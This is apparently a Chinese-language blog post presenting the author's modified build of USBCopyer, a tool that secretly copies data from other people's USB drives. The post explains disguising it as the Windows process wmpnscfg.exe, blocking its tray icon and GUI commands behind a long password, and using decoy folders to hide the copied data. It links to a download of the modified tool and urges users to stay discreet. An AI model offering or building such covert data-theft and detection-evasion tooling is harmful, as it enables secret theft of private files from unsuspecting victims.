简单网————————源代码以及原作者网站的信息——————————————————————————————————
github开源网址:https://github.com/kenvix/USBCopyer 原作者及原协助开发人员:kenvix(原作者)、redapple0204、Horange321 等
在此感谢作者以及开发人员的开源
————————————————————————————————————————-
说起这个USBCopyer,估计有一些大佬是很熟悉的。原软件虽然自带隐藏运行功能,但是我认为还不够,只要是熟悉这个软件的人,通过查找任务管理器进程就能找到,毕竟那个图标和进程名有点太明显了,被使用者此时只要继续顺藤摸瓜,右键定位进程路径,就能轻易找到软件和拷贝出的数据,使用者之前一切“精心”准备可以说都要泡汤了,搞不好还会得到一通问罪,这样的结果肯定是每个使用者都不想面对的。所以,对USBCopyer进行魔改是很有必要的,目标是尽力将带有USBCopyer的元素(图标、配置路径、文件属性等)尽可能替换或隐藏掉,这样就可以达到不被被使用者发现的目的。
隐藏一个进程其中一个好办法就是让它伪装成系统程序,不被人注意的系统后台程序就是一个很好的伪装对象,至于具体伪装成什么进程呢?根据我使用“进程截杀器”关闭后台节省内存的使用经验,wmpnscfg就很不错。这个后台进程是windows media player的网络共享进程,win7大概每次开机都会启动(win10里似乎没见到过这个,不过问题不大),而且有彩色图标。于是在修改源代码中封装的部分(assembly什么的)以及“Restorator 2018”的协助下,我成功将USBCopyer戴上了wmpnscfg的“面具”。
戴上了面具其实还没有结束,双击exe的情况下,USBCopyer的真面目还是会露出来(跳出托盘图标),虽然软件工作时是以隐藏模式运行的,但是谁又能保证不出意外呢?于是,我一个不懂C++的小白开始研究了起来,幸亏之前自己电脑上装了VS2019,打开项目才没有遇到多大阻力。经过我一次次摸索和试错,最后还真的被我“瞎猫碰上死耗子”给捣鼓出来了,这下再怎么双击exe都不会跳出托盘图标了,而且为了保险起见,所有能跳出窗口或托盘图标的命令(/gui、/setting、/reset)都被我改了,命令参数里还加上了64位字母数字组合的一串密码。这下即使是熟悉这些命令的人,也不可能在没有反编译软件的帮助下破解出开启软件GUI界面的命令;如果真的碰上了反编译高手,先不说在wmpnscfg的迷惑下他可能都不会有进行反编译的念头,光是反编译所花的时间之长,也足以让程序拷出相当可观的数据量(emmm,在反编译开始前就结束进程的情况除外,不过被发现之前的那段时间也足够程序发挥出自己的作用了);而且对于这个境界的人,他的U盘多多少少会有些特殊保护(加密或者隐藏),再来讨论偷拷已经没有意义了。如此,也就很难揭开这个程序的真面目了。而且,软件在关闭“允许多线程”选项的情况下,保留的永远是启动的第一个线程,换句话说,即使双击exe,也不会终止之前已经启动完毕且正在进行拷贝的程序,这点可以放心。此外,在不结束进程的情况下,exe和存放数据的文件夹会被占用,也删除不了(这一点似乎是我考虑多了,有点经验的人都会先终止进程,再删文件
)
有了双击不能弹出托盘图标作为保证,接下来我就可以再来增加一些迷惑性的措施,使那些通过定位进程查找文件路径的人再被迷惑一次。有人估计会说,把软件和数据所在的文件夹统统隐藏掉不好吗?这里引用《斗罗大陆》主角唐三的一句话——“视野中若有了焦点,就一定会存在盲点”,如果真的全隐藏起来,弹出的资源管理器窗口里就会是空空的一片,只要稍微有点警惕的人都会觉得这似乎有点不太正常,反而大大方方地放几个东西在那儿作为诱饵,让被使用者眼中出现“焦点”,就不会让人起疑心。放在那儿作为诱饵的自然就是wmpnscfg.exe和一个看起来像是记录日志和数据的文件夹。至于真正的数据文件,早就单独隐藏好了。即使出现意外,被使用者手一抖,把这个进程结束了,还把wmpnscfg.exe和用来迷惑的文件夹删了,从被使用者U盘拷出的部分数据也依旧存在,虽然可能不完整,但是被使用者也大概率发现不了拷出的数据在哪,相比被发现之后使用者受到一通问罪来说,已经是很好的结果了。
至此,USBCopyer的隐藏性和迷惑性已经拉满,应该不会给使用者拖后腿了吧。
哔哔了一堆,是时候放链接了:
https://www.lanzoup.com/b01iy0n3a
提取码:4to1
(提取码最后一位是数字一,倒数第二位是小写字母o)
“USBCopyer部署XP7.zip”和“USBCopyer部署810.zip”是软件本体;
“软件教程.zip”是软件的视频教程和文本说明;
另外两个开头带有“【源码】”字样的是代码,一个是没有动过的,一个是我修改的。
此外,软件也有2个不怎么影响使用的小bug:一个是版本号变成wmpnscfg的版本号了,不知是怎么回事,我只是改了封装的assembly信息,没有刻意去改软件界面(只不过把图标换了下);另一个是软件的重置功能不管是在GUI还是命令行都似乎不起效果,我手动在批处理里加了个删除config.xml的命令用来替换它(这个方法是可行的),希望有能力和精力的大佬可以完善一下这两个bug。
最后容我再唠叨几句,虽然我已经尽力将软件的隐藏迷惑属性拉满,但我也不能保证100%不会被被使用者发现拷贝的数据,所以
请务必谨慎低调使用本软件
请务必谨慎低调使用本软件
请务必谨慎低调使用本软件
重要的话说三遍
★☆此外,如因未经他人许可,使用本软件私自拷贝他人数据,被他人发现并引发纠纷甚至法律问题,本人不承担任何责任。★☆
——————————————————-the end—————————————————–